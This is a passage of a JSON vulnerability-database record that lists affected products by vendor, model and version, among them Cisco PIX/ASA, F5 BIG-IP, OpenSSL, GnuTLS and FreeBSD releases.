"_id": null,
"model": "systems insight manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0"
},
{
"_id": null,
"model": "java se sr10",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.188.0"
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "-release-p5",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2.(2.19)"
},
{
"_id": null,
"model": "windows server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.1"
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.17"
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0.2.3"
},
{
"_id": null,
"model": "transportation manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.5"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"_id": null,
"model": "linux enterprise server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "opensolaris build snv 128",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.1"
},
{
"_id": null,
"model": "opensolaris build snv 107",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.2.1"
},
{
"_id": null,
"model": "db2 universal database",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.7.1"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.2"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.6)"
},
{
"_id": null,
"model": "enterprise linux extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "-prerelease",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "system management homepage",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0.96"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.3"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(5)"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(3)2"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.0.4"
},
{
"_id": null,
"model": "java system directory server 2005q4",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.5.1"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "java system application server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.2"
},
{
"_id": null,
"model": "opensolaris build snv 108",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2.(2.7)"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.207.0"
},
{
"_id": null,
"model": "ons t31 omds metro wdm system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "15531"
},
{
"_id": null,
"model": "syslog-ng premium edition",
"scope": "eq",
"trust": 0.3,
"vendor": "balabit",
"version": "3.2"
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.3.1"
},
{
"_id": null,
"model": "developer\u0027s kit for java",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"_id": null,
"model": "opensolaris build snv 89",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.50"
},
{
"_id": null,
"model": "unified ip phone 7960g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 39",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "java system application server platform edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.0"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.2.2.5"
},
{
"_id": null,
"model": "project openssl g",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.3"
},
{
"_id": null,
"model": "-release-p8",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"_id": null,
"model": "windows server for itanium-based systems r2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1.5"
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4.8"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.0.4"
},
{
"_id": null,
"model": "opensolaris build snv 90",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 68",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.3"
},
{
"_id": null,
"model": "windows server for itanium-based systems",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20080"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.3"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(6)"
},
{
"_id": null,
"model": "systems insight manager sp5",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1(3)"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.1"
},
{
"_id": null,
"model": "blackberry enterprise server express for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.1"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.4"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.1"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.3.4"
},
{
"_id": null,
"model": "meeting exchange client registration server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "-0"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"_id": null,
"model": "ace module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "opensolaris build snv 61",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"_id": null,
"model": "linux enterprise debuginfo",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.2.12"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4"
},
{
"_id": null,
"model": "unity connection",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(1)"
},
{
"_id": null,
"model": "circle",
"scope": "eq",
"trust": 0.3,
"vendor": "voodoo",
"version": "1.1"
},
{
"_id": null,
"model": "java system web server sp11",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.5.4"
},
{
"_id": null,
"model": "enterprise linux desktop supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "opensolaris build snv 41",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.2.5"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"_id": null,
"model": "system management homepage",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "6.2"
},
{
"_id": null,
"model": "7.2-release-p4",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "ucosminexus client",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.4"
},
{
"_id": null,
"model": "7.0-release-p8",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"_id": null,
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "windows server enterprise edition sp1 beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20031"
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.3"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.3.2"
},
{
"_id": null,
"model": "os/400 v6r1m0",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(2)"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(5.2)"
},
{
"_id": null,
"model": "java system directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(7)"
},
{
"_id": null,
"model": "enterprise linux desktop version",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.2.5"
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "65004.0(9)"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34009.3.1"
},
{
"_id": null,
"model": "jdk 1.5.0.0 04",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "java system web server sp5",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "network security services",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.12"
},
{
"_id": null,
"model": "css11500 content services switch",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.50.3.45"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "java system directory server patch2",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "windows server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.14"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.6.3"
},
{
"_id": null,
"model": "coat systems director",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "0"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "7.5.1"
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.19"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3"
},
{
"_id": null,
"model": "linux enterprise sdk sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1(2)"
},
{
"_id": null,
"model": "opensolaris build snv 88",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified communications manager 7.1 su1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "java system web proxy server",
"scope": "ne",
"trust": 0.3,
"vendor": "sun",
"version": "4.0.13"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2.27)"
},
{
"_id": null,
"model": "java system directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.3"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0"
},
{
"_id": null,
"model": "project openssl h",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1"
},
{
"_id": null,
"model": "system management homepage",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.1"
},
{
"_id": null,
"model": "unified ip phones",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "9.0.2"
},
{
"_id": null,
"model": "project openssl a",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.5"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"_id": null,
"model": "project openssl i",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.6.1"
},
{
"_id": null,
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"_id": null,
"model": "java enterprise system",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "2.1-rc8",
"scope": null,
"trust": 0.3,
"vendor": "openvpn",
"version": null
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.9"
},
{
"_id": null,
"model": "cosminexus developer standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "fuji",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2.55)"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.4"
},
{
"_id": null,
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "3.0"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39"
},
{
"_id": null,
"model": "7.2-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.182.0"
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "11052.0"
},
{
"_id": null,
"model": "ace web application firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "solaris 10 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified ip phone sccp 8.2 sr2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.0.1"
},
{
"_id": null,
"model": "windows vista edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "x64"
},
{
"_id": null,
"model": "blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "4.1.4"
},
{
"_id": null,
"model": "enterprise linux for sap server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "ucosminexus service architect",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8"
},
{
"_id": null,
"model": "meeting exchange sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "web server r2",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2.81)"
},
{
"_id": null,
"model": "project openssl c",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "aura communication manager",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2.2"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16009.4.6"
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.3.2.17"
},
{
"_id": null,
"model": "system management homepage",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "6.1.0.103"
},
{
"_id": null,
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "windows vista beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2"
},
{
"_id": null,
"model": "unified intelligent contact management enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "7.5(8)"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.0.3"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(6.7)"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.3"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.2.6.1"
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "3.8.1"
},
{
"_id": null,
"model": "unified communications manager 4.3 sr1b",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "unified callmanager 4.1 sr7",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.50"
},
{
"_id": null,
"model": "circle",
"scope": "eq",
"trust": 0.3,
"vendor": "voodoo",
"version": "1.1.35"
},
{
"_id": null,
"model": "-release-p6",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "project openssl c",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.1"
},
{
"_id": null,
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "3.0"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "wide area application services 4.1.1b",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.2"
},
{
"_id": null,
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.4"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)28"
},
{
"_id": null,
"model": "jdk 07",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2.4"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.1"
},
{
"_id": null,
"model": "wireless control system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1.91.0"
},
{
"_id": null,
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "novell",
"version": "3.1"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.9"
},
{
"_id": null,
"model": "unified ip phone",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7935"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.1"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.31"
},
{
"_id": null,
"model": "nx-os",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(3)"
},
{
"_id": null,
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"_id": null,
"model": "opensolaris build snv 92",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "linux x86 64 -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"_id": null,
"model": "css11500 content services switch",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.5"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.10"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(4)"
},
{
"_id": null,
"model": "opensolaris build snv 83",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "opensolaris build snv 106",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "opensolaris build snv 125",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "11x64"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.23"
},
{
"_id": null,
"model": "windows server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.2.2"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.10"
},
{
"_id": null,
"model": "7.0-release-p3",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.1"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.8.3"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "windows server enterprise edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.3"
},
{
"_id": null,
"model": "6.4-release-p4",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(1)5"
},
{
"_id": null,
"model": "project openssl a",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "esx",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "4.1"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.52"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "1.4.1"
},
{
"_id": null,
